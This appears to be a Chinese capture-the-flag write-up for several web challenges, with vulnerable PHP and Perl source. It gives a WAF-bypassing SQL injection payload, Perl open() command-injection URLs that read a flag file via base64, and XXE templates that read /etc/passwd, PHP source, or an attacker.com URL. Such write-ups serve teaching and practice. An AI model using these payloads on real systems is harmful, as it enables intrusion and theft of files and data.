噗噗T1

直接读取index.pl拿到flag.

image
image

信息收集

丢到google
image

nmap也能扫出来。

元数据存储

源代码泄露

image
直接把flag泄露出来了。

babysql2

这题是赛后请教的表哥,膜一波表哥。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
include "config.php";
echo "<center><h1>Welcome to my site</h1></center><br>";
$id = $_GET['id']?waf($_GET['id']):1;
$sql = "select * from error_news where id = $id";
echo "<!--view source /source.php-->";
$row = mysql_fetch_array(mysql_query($sql));
if (empty($row) or mysql_error()){
echo "<center>no content detail</center>".mysql_error();
}else{
echo "<center><table border=1><tr><th>title</th><th>Content</th></tr><tr><td>${row['title']}</td><td>${row['content']}</td></tr></table></center>";
}
function waf($var){
if(stristr($_SERVER['HTTP_USER_AGENT'],'sqlmap')){
echo "<center>hacker<center>";
die();
}
$var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
return $var;
}

这里要进行SQL注入的话需要绕过那个waf,如果payload中含有类似aunion就会被替换成&#160;$2,比赛之后请教了下表哥。

1
payload:http://118.178.18.181:57019/?id=\Nunion select%201,flag,%20\Nfrom%20flag#

这里用了\N去绕过,并且对原语句的影响不大。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
mysql> select * from users where id=\Nunion select 1,email_id,\Nfrom emails;
+----+------------------------+----------+
| id | username | password |
+----+------------------------+----------+
| 1 | Dumb@dhakkan.com | NULL |
| 1 | Angel@iloveu.com | NULL |
| 1 | Dummy@dhakkan.local | NULL |
| 1 | secure@dhakkan.local | NULL |
| 1 | stupid@dhakkan.local | NULL |
| 1 | superman@dhakkan.local | NULL |
| 1 | batman@dhakkan.local | NULL |
| 1 | admin@dhakkan.com | NULL |
+----+------------------------+----------+
8 rows in set (0.00 sec)

噗噗T2

http://www.vuln.cn/6241中的一道题类似

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/perl
use CGI qw(:standard);
require "flag.pl";
foreach (qw(ENV BASH_ENV CDPATH IFS TERM)) {delete $ENV{$_}}; $ENV{PATH}='/bin:/usr/bin';
print header(-type=>'text/html',-charset=>"utf-8");
local $file = param('file');
local $html;
#flag{flag1_song_ni_le}
if ($file =~ /flag/i) {
print ("not that easy\n");
die;
}
open(file, "$file") || print "error: couldnt open $file : $!\n";
while (<file>) { $html .= $_; }
close(file);
print $html;

open函数可以导致命令执行。

1
2
3
http://118.178.18.181:57016/index.pl?file=|pwd| #爆出路径
http://118.178.18.181:57016/index.pl?file=|`echo%20Y2F0IC92YXIvd3d3L2h0bWwvZmxhZy5wbA==%20|%20base64%20-d`| #读出flag

readme

再次膜一波表哥。

首先是xxe攻击读取文件,php伪协议读出flag.php,是经过phpjm加密的,可以直接在线解密,也可以直接包含输出全局变量。

1
2
3
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php

附XXE攻击的几种构造的payload模型:

1
2
3
4
5
6
7
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
1
2
3
4
5
6
7
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
1
2
3
4
5
6
7
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

findpwd is ready

读到源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
header("Content-Type:text/html;charset=utf8");
include "config.php";
// 1.sql
if ($_SERVER["REQUEST_METHOD"]=="GET"){
echo include "tpl.php";
}else if ($_SERVER["REQUEST_METHOD"]=="POST"){
$mail = mywaf($_POST['mail']);
$sql = "select * from users where mail='$mail'";
$res = mysql_query($sql);
$row = mysql_fetch_array($res);
if (!empty($row['password'])){
mymail($mail);
$output = "新的密码已经发送到您的邮箱$mail,请查收";
}else{
$output = "邮箱不存在,请重试";
}
echo include "tpl.php";
}
function mywaf($mail){
if(!preg_match("/^[a-z0-9\s,\-']+@([a-z0-9]+\.)+[a-z0-9]{1,5}$/i",$mail)){
$output="非法邮箱,请重试";
echo include "tpl.php";
exit();
}else{
return $mail;
}
}
function mymail($mail){
mail($mail,'flag','flag{***********}');
}

1.sql如下:

1
2
3
4
5
6
7
8
9
10
11
drop database if exists fuckbean;
create database fuckbean;
use fuckbean;
create table users(
id int(5),
username varchar(20),
password varchar(32),
mail varchar(50)
);
insert into users values(1,"admin","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","admin@admin.com");
grant all privileges on fuckbean.* to fuckbean@localhost identified by 'fuckbean';

然后思路是够着payload使发送的邮件发送到自己邮箱。